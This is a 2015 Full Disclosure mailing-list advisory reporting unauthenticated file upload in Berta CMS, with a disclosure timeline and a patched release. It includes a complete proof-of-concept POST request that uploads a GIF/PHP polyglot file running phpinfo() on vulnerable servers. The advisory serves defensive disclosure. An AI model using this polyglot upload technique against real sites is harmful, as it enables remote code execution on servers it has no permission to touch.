[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Insecure file upload in Berta CMS
From: Simon Waters <simon.waters () surevine ! com>
Date: 2015-03-26 18:01:09
Message-ID: F9EED012-4100-4170-8C48-FF3050869169 () surevine ! com
[Download RAW message or body]
Berta CMS is a web based content management system using PHP and local file storage.
http://www.berta.me/
Due to use of a 3rd party Berta CMS website to redirect links within a phishing email brought \
to our attention we checked the file upload functionality of this software.
We found that the file upload didn't require authentication.
Images with a ".php" extension could be uploaded, and all that was required is that they pass \
the PHP getimagesize() function and have suitable dimensions.
It is possible for GIF image files (and possibly other image files - not tested) to contain \
arbitrary PHP whilst being well enough formed to pass the getimagesize() function with \
acceptable dimensions.
http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/ \
<http://ha.ckers.org/blog/20070604/passing-malicious-php-through-getimagesize/>
We can't ascertain if this is the weakness that was used to compromise the 3rd party server in \
question, however the patch requires authentication for all file uploads, which will likely \
resolve any similar issues.
The author was notified: 2015-03-22
Author Acknowledge: 2015-03-23
Patch released: 2015-03-26
The berta-0.8.10b.zip file from: http://www.berta.me/download/ includes a fix that requires \
authentication to upload files.
This announcement should not be interpreted as implying either the author, or Surevine, have \
conducted any in-depth assessment of the suitability of Berta CMS for any purpose (Sometimes \
you just want to make life harder for those sending phishing emails).
The following POST request will upload a c.php file which will run phpinfo() when fetched on \
vulnerable servers.
POST /engine/upload.php?entry=true&mediafolder=.all HTTP/1.1
Host: 192.168.56.101
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.56.101/upload.html
Connection: keep-alive
Content-Type: multipart/form-data; \
boundary=---------------------------2147563051636691175750543802
Content-Length: 1617
-----------------------------2147563051636691175750543802
Content-Disposition: form-data; name="Filedata"; filename="c.php"
Content-Type: text/php
GIF89/* < ÿÿÿfffÌÌÌ333Ìÿÿ™™™3ffÌÌÿÌÿÌ™™Ìf3f 33 f™™3 3 3!þ GIF \
SmartSaver Ver1.1a , È < þ ÈI 8ëÍ ÿ`(Ždižh lë p,Ïtmßx ï|ïÿÀ p È \
r™$ö˜ 4ê Z Õ cËíz `n { „ 2-xLn ßé |Î` \
^O6‡ãkp‚ƒ„#jtˆ]v)~`}g€_‹…"••‡‰‰"' _ 1˜ – ‚ ™s›& ^ŸŽ \
a ? g $ ] ž ÃÄ< Âw X \‘^ ÅÒÓ+ÇÈÐ,Í[Ô%ÇÑÜ á)ÖßÙËâ \
Þèëì'äeç MÌJ êíøùö x{{ üý P€‚64 ðVpÃ@> 8PƒÄ3 R pOŸÇ þ ÞU8˜!@˜ \
(SbL9 a "š6Z8 É 03 ) #ÈŸøD Œ÷òä I qY RN›D $ Æ€ O XÅ p Qd‹ P s \
c˜ &'y5 Ûi[ÓF ð ‹R~ ÄŽ%Û4 Z { Ðö a[q ΕP—Ë]Yy o™„mc/*ål,| 3 \
Ä )\fðX˜d.L+Ç"à Àh 8{žM ôb×'‡‚**GãEŒ Tï>Ø gnãÉh+/d{ …у \
FU;ñ9ë ‰Xv} A/ Ø —‹ Ôü u0Ñå:g Ãëô xv-À'å Çë'R ˜Wô ™þ' f \
XCÅuýÜÆ ~áíç ý âÞqê xÐ7Þ}ÑP{ ç Ö„Ô ƒ$ / (Ýz zQÜLááÕ € \
ý6‡ˆÉ• c ':"â é) w Ý < H A5å‚ $;FÉ ŒJúw Z ž -ƒ$ Iõ "Ob#å™8ô \
Í ˜e)a™vu@ä— „6f"p æž5 ‰Ð XVù&r v 3jy'ž„šÉç /øY …B
h œ^ž f<‹'FP‹(n % )›q
*{\j0 už *f; ê Ž– Ú kÒ `ž‚
k oZÓ þæ ë ôzå j9ë / 9*/<?php phpinfo(); ?>/*
`ÇŽ Ì U . áBkî>#VëE' î • j v í åœë/ ‹ Æ;h 6 D ` \
k0 Ç H ÿú› ÃòN n Äñf/ a÷ ÀkFÜ ‡ WlîÅÊÊ4f c Q s 6 ˆz Ê1/RÇ \
Ê@Wpñ ™É & Ç]Aæ|ïš ñ n O ôÕ o+îi! !""ÓÀ"4õ —2Ö ^ \
óX0wÊ Z™ F6É rÝuÖV Û Ò óÔzâ Hqw?|k ‚ÿìwÅnóýUÆ'k øá‡e |ùŸ• \
7šã [L%G‚ãA á}‹–Ku™7 éza q- k‡Žfä ŽÔé $nç Àk v 'o \
D(åá < éQ€ ` ` q}FÙ*ïý÷ ‡/þøä—oþùè þúì \
ïþûðÇ/ÿüô×oÿýøç ÿþü÷ïÿÿ ;
-----------------------------2147563051636691175750543802
Content-Disposition: form-data; name="submit"
Upload Image
-----------------------------2147563051636691175750543802--
Simon Waters
phone +448454681066
email simon.waters@surevine.com
skype simon.waters.surevine
Participate | Collaborate | Innovate
Surevine Limited
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic